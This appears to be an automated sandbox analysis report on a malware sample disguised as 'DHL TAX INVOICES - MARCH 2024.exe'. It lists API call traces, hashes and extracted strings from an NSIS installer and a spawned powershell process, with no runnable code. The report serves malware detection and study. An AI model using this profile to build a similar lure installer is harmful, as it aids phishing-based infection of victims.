                                                            • Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
                                                            • Opcode Fuzzy Hash: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                            • Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                            • wsprintfW.USER32 ref: 00402D56
                                                            • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                            • Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
                                                            • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                            • Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                            • Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
                                                            • Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                            • Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                            • wsprintfW.USER32 ref: 00404B43
                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$(7B
                                                            • API String ID: 3540041739-1320723960
                                                            • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                            • Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
                                                            • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                            • Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                            • GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                            • GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                            • String ID: IsWow64Process$kernel32
                                                            • API String ID: 4190356694-3789238822
                                                            • Opcode ID: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                            • Instruction ID: 3ef6a93ad146ebeaf0d17e4587e90b9f2b778901b0e47637b23e27d0b58942e2
                                                            • Opcode Fuzzy Hash: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                            • Instruction Fuzzy Hash: F3E04672905228ABFA10D7E18C4CA8F3BACEB042C1B000511FA01D310DEAA0DA009AA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                            • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
                                                            • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                            • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001859
                                                            • lstrlenW.KERNEL32(?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001864
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001882
                                                            • CharNextW.USER32(?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001894
                                                            • lstrlenW.KERNEL32(00000000,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 1000189D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                            • Instruction ID: 16644b8c66c095f8957e8181be225378e242880d30504b603972565d7ff9e5a1
                                                            • Opcode Fuzzy Hash: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                            • Instruction Fuzzy Hash: DC011D35600628EFEB11DFA5CC809DE77A8EF452D07658066FD04D7225EB70DA41DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
                                                            • Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
                                                            • Opcode Fuzzy Hash: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
                                                            • Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                            • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
                                                            • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                            • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,?,0040B5D8,000000FF,C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidelstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll
                                                            • API String ID: 3109718747-3756960130
                                                            • Opcode ID: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
                                                            • Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
                                                            • Opcode Fuzzy Hash: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
                                                            • Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,ExecToStack,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00406075
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00406096
                                                            • RegCloseKey.ADVAPI32(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 004060B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: ExecToStack
                                                            • API String ID: 3677997916-166031814
                                                            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
                                                            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3081826266
                                                            • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
                                                            • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                              • Part of subcall function 0040585E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                              • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3585118688-0
                                                            • Opcode ID: 74bb8869648c35fd16b063611755013e952a71dae8eb69fe35b11bf96a1a4cfc
                                                            • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                            • Opcode Fuzzy Hash: 74bb8869648c35fd16b063611755013e952a71dae8eb69fe35b11bf96a1a4cfc
                                                            • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                            • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsi41AC.tmp, xrefs: 0040390B
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi41AC.tmp
                                                            • API String ID: 2962429428-1167774919
                                                            • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                            • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
                                                            • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                            • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$1033
                                                            • API String ID: 530164218-2847381411
                                                            • Opcode ID: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                            • Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
                                                            • Opcode Fuzzy Hash: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                            • Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405BEB
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405C93
                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0), ref: 00405CA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: 0_B
                                                            • API String ID: 3248276644-2128305573
                                                            • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                            • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
                                                            • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                            • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00405280
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                            • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
                                                            • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                            • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                            • CloseHandle.KERNEL32(?), ref: 00405894
                                                            Strings
                                                            • Error launching installer, xrefs: 00405871
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                            • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                            • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                            • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405B84
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405B94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-224404859
                                                            • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
                                                            • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                            • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                            • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
                                                            • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                            • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-4202989938
                                                            • Opcode ID: 52a0c35fef672637659feb1dd315a6d68e945ccfb65a89fe2bcc89bc4753af5a
                                                            • Instruction ID: f56d0dd6f4d7f58b007357117f876707ae3cd344272ca762394a98c21ef592db
                                                            • Opcode Fuzzy Hash: 52a0c35fef672637659feb1dd315a6d68e945ccfb65a89fe2bcc89bc4753af5a
                                                            • Instruction Fuzzy Hash: D4F27FB4A00328DFDB60DB64C955BDEB7B2BB85304F1085A9E409AB751CB31ED86CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V&k
